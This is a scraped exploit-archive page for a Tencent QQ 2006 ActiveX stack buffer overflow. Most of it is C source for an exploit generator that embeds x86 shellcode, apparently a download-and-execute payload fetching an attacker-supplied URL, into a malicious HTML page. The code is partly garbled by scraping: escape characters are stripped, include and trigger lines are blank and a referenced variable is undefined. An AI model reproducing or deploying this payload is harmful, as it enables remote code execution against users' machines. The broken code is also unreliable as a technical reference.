Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Tencent QQ Stack-based Buffer Overflow - exploit.company
header-logo
Suggest Exploit
vendor:
Tencent QQ
by:
Unknown
7.5
CVSS
HIGH
Stack-based Buffer Overflow
121
CWE
Product Name: Tencent QQ
Affected Version From: Tencent QQ 2006 and prior versions
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Tencent QQ Stack-based Buffer Overflow

Tencent QQ is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data. Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

Mitigation:

Update to a version of Tencent QQ that is not vulnerable.
Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/26613/info

Tencent QQ is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.

Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

These issues affect Tencent QQ 2006 and prior versions. 
*/

#include
#include
#include
FILE *fp = NULL;
char *file = "fuck_exp1.html";
char *url = NULL;
unsigned char sc[] =
"x60x64xa1x30x00x00x00x8bx40x0cx8bx70x1cxadx8bx70"
"x08x81xecx00x04x00x00x8bxecx56x68x8ex4ex0execxe8"
"xffx00x00x00x89x45x04x56x68x98xfex8ax0exe8xf1x00"
"x00x00x89x45x08x56x68x25xb0xffxc2xe8xe3x00x00x00"
"x89x45x0cx56x68xefxcexe0x60xe8xd5x00x00x00x89x45"
"x10x56x68xc1x79xe5xb8xe8xc7x00x00x00x89x45x14x40"
"x80x38xc3x75xfax89x45x18xe9x08x01x00x00x5ex89x75"
"x24x8bx45x04x6ax01x59x8bx55x18x56xe8x8cx00x00x00"
"x50x68x36x1ax2fx70xe8x98x00x00x00x89x45x1cx8bxc5"
"x83xc0x50x89x45x20x68xffx00x00x00x50x8bx45x14x6a"
"x02x59x8bx55x18xe8x62x00x00x00x03x45x20xc7x00x5c"
"x7ex2ex65xc7x40x04x78x65x00x00xffx75x20x8bx45x0c"
"x6ax01x59x8bx55x18xe8x41x00x00x00x6ax07x58x03x45"
"x24x33xdbx53x53xffx75x20x50x53x8bx45x1cx6ax05x59"
"x8bx55x18xe8x24x00x00x00x6ax00xffx75x20x8bx45x08"
"x6ax02x59x8bx55x18xe8x11x00x00x00x81xc4x00x04x00"
"x00x61x81xc4xdcx04x00x00x5dxc2x24x00x41x5bx52x03"
"xe1x03xe1x03xe1x03xe1x83xecx04x5ax53x8bxdaxe2xf7"
"x52xffxe0x55x8bxecx8bx7dx08x8bx5dx0cx56x8bx73x3c"
"x8bx74x1ex78x03xf3x56x8bx76x20x03xf3x33xc9x49x41"
"xadx03xc3x56x33xf6x0fxbex10x3axf2x74x08xc1xcex0d"
"x03xf2x40xebxf1x3bxfex5ex75xe5x5ax8bxebx8bx5ax24"
"x03xddx66x8bx0cx4bx8bx5ax1cx03xddx8bx04x8bx03xc5"
"x5ex5dxc2x08x00xe8xf3xfexffxffx55x52x4cx4dx4fx4e"
"x00";
char * header =
" "
" "
" "
" ";
char * trigger =
" "
" "
" "
" "
" ";
// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
for(i=0;i{
if((i%16)==0)
{
if(i!=0)
{
printf("" "");
fprintf(fp, "%s", "" + "");
}
else
{
printf(""");
fprintf(fp, "%s", """);
}
}
printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}
//?shellcode???header??,??? " ) " ??
printf(""; ");
fprintf(fp, "%s", ""); ");
fflush(fp);
}
void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};
int sc_len = 0;
if (argc < 2)
{
printf("Tencent QQ VQQPlayer.ocx (all version) 0day! ");
printf("Bug Found by axis@ph4nt0m ");
printf("Date: 2006-12-27 ");
printf(" Usage: %s [Local htmlfile] ", argv[0]);
exit(1);
}
url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://"))    strlen(url) < 10)
{
printf("[-] Invalid url. Must start with 'http://','ftp://' ");
return;
}
printf("[+] download url:%s ", url);
if(argc >=3) file = argv[2];
printf("[+] exploit file:%s ", file);
fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error! ");
return;
}
//build evil html file
fprintf(fp, "%s", header);
fflush(fp);
memset(buf, 0, sizeof(buf));
sc_len = sizeof(sc)-1;
memcpy(buf, sc, sc_len);
memcpy(buf+sc_len, url, strlen(url));
sc_len += strlen(url)+1;
PrintPayLoad((char *)buf, sc_len);
fprintf(fp, "%s", footer);
fflush(fp);
fprintf(fp, "%s", trigger);
fflush(fp);
printf("[+] exploit write to %s success! ", file);
}

Navigation

Suggest Exploit

Services By CQR